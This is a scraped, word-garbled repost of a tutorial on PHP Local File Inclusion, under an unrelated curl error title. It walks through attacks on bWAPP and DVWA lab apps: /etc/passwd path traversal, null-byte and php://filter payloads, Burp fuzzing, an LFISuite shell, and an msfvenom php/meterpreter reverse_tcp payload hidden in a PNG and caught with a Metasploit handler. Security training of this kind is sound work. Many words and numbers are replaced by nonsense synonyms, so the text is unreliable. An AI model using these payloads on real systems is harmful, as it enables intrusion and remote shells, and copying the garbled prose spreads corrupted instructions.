Curl: (26) Failed to Open/read Local Data From File/application

In this deep downward online world, dynamic web-applications are the ones that can hands exist breached by an attacker due to their loosely written server-side codes and misconfigured system files. Today, we volition learn virtually File Inclusion, which is considered as 1 of the most disquisitional vulnerability that somewhere allows an assaulter to manipulate the target'due south spider web server past including malicious files remotely or fifty-fifty admission sensitive files present onto that server.

Table of Content

• Introduction
• PHP Functions
  • Include() function
  • Require() function
  • Require-once() part
• Local File Inclusion
• LFI Exploitation
  • Basic LFI Assail
  • Null byte Attack
  • Base64 Attack
  • Fuzzing Attack
  • LFI Suite
  • LFI over File UPload
• Mitigation

Introduction

File Inclusion vulnerabilities are normally institute in poorly written PHP spider web-applications where the input parameters are not properly sanitized or validated. Therefore information technology becomes easy for an attacker to capture the passing HTTP Requests, manipulates the URL parameter that accepts a filename and include the malicious files in the web-server.

In order to understand the mechanism, let's take a expect at this scenario.

Consider a web-application that accepts a parameter that says "file=hackingarticles.php" via its URL, the server further processes it and displays its content on the application's screen.

Now the attacker tries to manipulate the filename parameter and calls upwardly a local file or even injects a malicious script or a payload calling information technology from his own website into that parameter, thus the web-server volition procedure information technology and executes that particular file which might pb to the following attacks:

• Code execution on the Web server
• Cross-Site Scripting Attacks (XSS)
• Denial of service (DOS)
• Data Manipulation Attacks
• Sensitive Information Disclosure

The affect of this vulnerability is quite high and has therefore been reported under-

1. CWE-98: "Improper Command of Filename for Include/Require Argument in PHP Program"
2. CWE-20: "Improper Input Validation"
3. CWE-22: "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"
4. CWE-23: "Relative Path Traversal"
5. CWE-200: "Exposure of Sensitive Data to an Unauthorized Actor"

The File Inclusion attacks are of two types:

1. Local File Inclusion (LFI)
2. Remote File Inclusion (RFI)

Earlier we get into the depth of these file inclusion attacks, let'south have a look at some of the PHP functions.

PHP Include() Role

We can insert the content of one PHP file into some other PHP file before the server executes it, with the include() function. The function can be used to create functions, headers, footers or element that will be reused on multiple pages.

This will help the developers to make information technology piece of cake to alter the layout of a consummate website with minimal effort i.eastward. if in that location is any change required then instead of changing thousands of files just change the included PHP file.

Example 1

Assume we have a standard footer file called "footer.php", that looks similar this

<?php echo "<p>Copyright &copy; 2010-" . date("Y") ."hackingartices.in</p>"; ?>

To include the footer file on our page, we'll be using the include argument.

<html> <trunk> <h1>Welcome to Hacking Articles</h1> <p>Some text.</p> <p>Some more text.</p> <?php include 'footer.php';?> </body> </html>

The code within the included file (footer.php) is interpreted just every bit if it had been inserted into the main folio.

Example ii

Assume we take a file called "vars.php", with some variables divers:

?php $color='red'; $car='BMW'; ?>

Test.php

<html> <torso> <h1>Welcome to my Home Page!!</h1> <?php echo "A$color$car";  //Output A include 'var.php'; echo "A$color$car";  //A red BMW ?> </body> </html>

As soon equally the fifth line executes in the examination.php file, merely "A" volition be printed out because we haven't called our var.php script yet. Whereas in the next line, we have used the include role to include the var.php file, as before long as the interpreter reads this line it directly calls our file from the server and executes it.

Therefore the variables "colour" and "car" are at present assigned with "scarlet" and "BMW". As the last line runs, we'll get the output as "A cherry-red BMW".

PHP Require() Role

Similar to the include() function, the crave statement is also used to include a file into the PHP code. Nevertheless, there is a one large departure betwixt include and require functions. When a file is included with theinclude statement and PHP cannot notice it or load it properly, thus the include() function generates a warning but the script will proceed to execute:

Example three

<html> <body> <h1>Welcome to my home page!</h1> <?php include 'noFileExists.php'; echo "I take a $color $car."; ?> </body> </html>

Output: I have a Red BMW

At present if we effort to run the aforementioned code using thecrave function, the echo statement will not be executed because the script execution dies every bit shortly as the require statement return a fatal error:

<html> <body> <h1>Welcome to my habitation page!</h1> <?php require 'noFileExists.php'; echo "I take a $colour $auto."; ?> </body> </html>

No output event.

PHP Require_once() Role

We can use the Require_once() part to access the data of another page into our page but only once. It works in a similar way every bit the require() function practise. The only deviation between crave and require_once is that, if it is found that the file has already been included in the page, so the calling script is going to ignore further inclusions.

Example iv

echo.php

<?php repeat "Hullo"; ?>

Test.php

<?php require('echo.php'); require_once('echo.php'); ?>

Output: "Hello"

Local File Inclusion (LFI)

Local file inclusion is the vulnerability in which an attacker tries to trick the web-application by including the files that are already nowadays locally into the server. It arises when a php file contains some php functions such as "include", "include_once", "require", "require_once".

This vulnerability occurs, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, assuasive directory traversal characters (such as dot-dot-slash) to be injected. Thus, the local file inclusion has "High Severity with a CVSS Score of viii.1"

Let's try to exploit this LFI vulnerability through all the dissimilar ways nosotros tin, I take used two different platforms bWAPP and DVWA which contains the file inclusion vulnerability.

Basic Local file inclusion

Nosotros'll open the target IP in our browser and login inside BWAPP as a bee : bug, further nosotros will set the "cull your bug" choice to Remote & Local File Inclusion (RFI/LFI) and hitting hack, even for this time nosotros'll keep our security level to "depression".

Now, we'll be redirected to the web page which is basically suffering from RFI & LFI Vulnerability. There nosotros will find a comment section to select a language from the given drop-downward list, as soon as we click on become button, the selected language file gets included into the URL.

In social club to perform the basic LFI set on, we'll be manipulating the "URL language parameter" with "/etc/passwd" to access the password file present in the local system as:

192.168.0.eleven/bWAPP/rlfi.php?linguistic communication=/etc/passwd

Then nosotros've successfully get into the password file and we are able to read this sensitive information directly from the webpage. Similarly we can even read the contents of the other files using "/etc/shadow" or "/etc/grouping"

Null byte

In many scenarios, the basic local file inclusion set on might non work, due to the high-security configurations. From the below image y'all can find that, I got failed to read the password file when executing the aforementioned path in the URL.

So what should nosotros do when nosotros got stuck in some similar situations?

The respond is to go for the Null Byte Attack. Many developers add up a '.php' extension into their codes at the end of the required variable before it gets included.

Therefore the webserver is interpreting /etc/passwd as /etc/passwd.php, thus we are non able to access the file. In club to get rid of this .php we try to terminate the variable using the null byte character (%00) that will force the php server to ignore everything after that, as soon every bit information technology is interpreted.

192.168.0.11/bWAPP/rlfi.php?linguistic communication=/etc/passwd%00

Slap-up, we are back!! We can read the contents of the password file again.

Yous tin can even grab the same using burpsuite, by simply capturing the browser's request in the proxy tab, manipulating its URL with /etc/passwd%00 and forwarding it all to the repeater. Inside repeater, we tin can do a deep analysis of the sent requests and responses generated through information technology.

Now we but demand to click on the go tab. And on the right side of the window, you lot can see that the password file is opened every bit a response.

Base64 encoded

Sometimes the security configuration is much high and nosotros're unable to view the contents of the included PHP file. Thus we can still exploit the LFI vulnerability past only using the following PHP part.

192.168.0.xi/bWAPP/rlfi.php?language=php://filter/read=convert.base64-encode/resource=/etc/passwd

Therefore from the below screenshot you can decide that the contents of the password file is encoded in base64. Copy the whole encoded text and endeavour to decode it with any base64 decoder.

I've used the burpsuite decoder in social club to decode the higher up-copied text.

Get to the Decoder option in burpsuite and paste the copied base64 text into the field provided, at present on the right-hand side click on decode as and choose Base64 from the options presented.

And here nosotros go, you can encounter that we have successfully grabbed the password file again.

Fuzzing

Many times it is not possible to check for all these scenarios manually, and fifty-fifty sometimes our included file might not be there in the root directory. Thus in order to deface the website through the LFI vulnerability, we need to traverse back and detect the bodily path to that included file. This traversing tin contain a lot of permutation and combinations, therefore we'll make a dictionary with all the possible conditions and will simply include it in our set on.

From the below screenshot, you can see that I've send the intercepted request to the intruder with a elementary right-click in the proxy tab and further selecting the send to intruder option.

At present we need to load our dictionary file into the payload department and set the payload type to Uncomplicated list as highlighted in the below prototype.

So, we are almost washed, we merely need to gear up the payload position to our input value parameter and simply burn the "Start Assault" push to launch our fuzzing attack.

From the beneath image nosotros tin see that our attack has been started and there is a fluctuation in the length section. As soon every bit we discover any increment in whatsoever of the supplied input status, nosotros'll check its response to reading the contents of the included file.

LFI Suite

Sometimes it becomes a fleck frustrating while performing the LFI attack using Burp suite, i.eastward. wait for the incremented length and cheque for every possible response it shows. In order to make this task somewhat simpler and faster, nosotros'll exist using an astonishing automated tool called LFI Suite. This helps us to scan the web site's URL and if institute vulnerable, information technology displays all the possible results, therefore nosotros can use it to proceeds the website's remote shell. Yous tin can download this from hither.

Firstly we'll clone the LFI suite and boot it up in our kali auto using the following code:

git clone https://github.com/D35m0nd142/LFISuite.git cd LFISuite python lfisuite.py

Choose the two^nd selection equally "Scanner" in lodge to check the possible input parameters.

At present it ask us to "enter the cookies", I've installed the "HTTP Header live" plugin to capture the HTTP passing requests.

From the beneath image you can run into that I've copied the captured cookies into the cookies field and disable the Tor proxy. Nosotros merely need to enter the website's URL and hit enter.

At present the attack has been started and we tin can come across that in that location are 40 different parameters through we tin can exploit the LFI vulnerability into our spider web-application.

At present information technology's time to connect to the victim and deface the website by capturing its remote shell.

Restart the application and this time choose pick ane as "Exploiter". Enter the required fields with the aforementioned cookies that we've used in the scanner section and set up the Tor proxy to "No".

 Equally soon equally you hit enter, y'all'll find a list with multiple ways to assault the webserver.

Select the option 9 as "Motorcar Hack".

A new department volition pop-up asking for the spider web site's URL, here enter the target website and hit enter.

http://192.168.0.xi/bWAPP/rlfi.php?linguistic communication=

Cool!! We've successfully captured the victim'due south control shell.

LFI over File Upload

As nosotros all are enlightened with the File Upload vulnerability, that it allows an attacker to upload a file with the malicious code in it, which tin be executed on the server. You tin can acquire more about this vulnerability from here .

But what, if the web-server is patched with the file upload vulnerability using loftier security?

Not a large issue. Nosotros just need an unpatched file inclusion vulnerability into that, therefore we tin bypass its high security through the file inclusion vulnerability and fifty-fifty get the reverse connection of victim's server.

Let's check it out how.

Firstly I've downloaded an paradigm raj.png and saved it on my desktop.

At present I'll open up the terminal and blazon following command to generate a malicious PHP code inside "raj.png" image.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.9 lport=4444 >> /dwelling house/hackingarticles/Desktop/raj.png

Permit's verify whether our injected code is in the image or not.

cat /domicile/hackingarticles/Desktop/raj.png

At the bottom, yous will find that the prototype is having the PHP code in information technology. This ways that our malicious epitome is fix, and nosotros are at present able to upload it over the spider web awarding.

Now explore the target's IP in browser and login into DVWA with security level high. Choose the vulnerability as a file upload in order to upload the malicious image into the web-applications server.

From the given screenshot, y'all can encounter "raj.png" paradigm is successfully uploaded.

Copy the highlighted path where the image is uploaded.

Before executing the image, we'll boot the Metasploit framework inside the Kali Linux and start-up multi/handler.

msf > apply multi/handler msf exploit(handler) > set payload php/meterpreter/reverse_tcp msf exploit(handler) > gear up lhost 192.168.0.9 msf exploit(handler) > prepare lport 4444 msf exploit(handler) > exploit

Now nosotros'll get dorsum to DVWA and set security level low and will turn on the File Inclusion vulnerability. This time we will again manipulate the URL parameter "page=" by pasting the above-copied path of uploaded image.

192.168.0.eleven/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/raj.png

As presently as the URL loads upwards into the browser, nosotros will get the reverse connexion of the server in our Kali machine.

Mitigations to File Inclusion Attacks

1. In order to prevent our website from the file inclusion attacks, we need to employ the potent input validations i.eastward. rather allow any file to be included in our web-awarding we should restrict our input parameter to accept a whitelist of acceptable files and turn down all the other inputs that exercise not strictly conform to specifications.

We can examine this all with the following code snippet.

From the above image y'all can meet that, there is an if condition, which is only assuasive the whitelisted files and replaying all the other files with "ERROR: File not Found!"

2. Exclude the directory separators "/" to prevent our web-awarding from the directory traversal attack which may further lead to the Local File Inclusion attacks.
3. Develop or run the code in the most contempo version of the PHP server which is available. And even configure the PHP applications and so that it does not use register_globals.

Source: https://www.w3schools.com/

https://www.owasp.org/alphabetize.php/Testing_for_Local_File_Inclusion

               https://www.acunetix.com

Author: Chiragh Arora is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. Contact here

dwightforthown.blogspot.com

Source: https://www.hackingarticles.in/comprehensive-guide-to-local-file-inclusion/

Share this post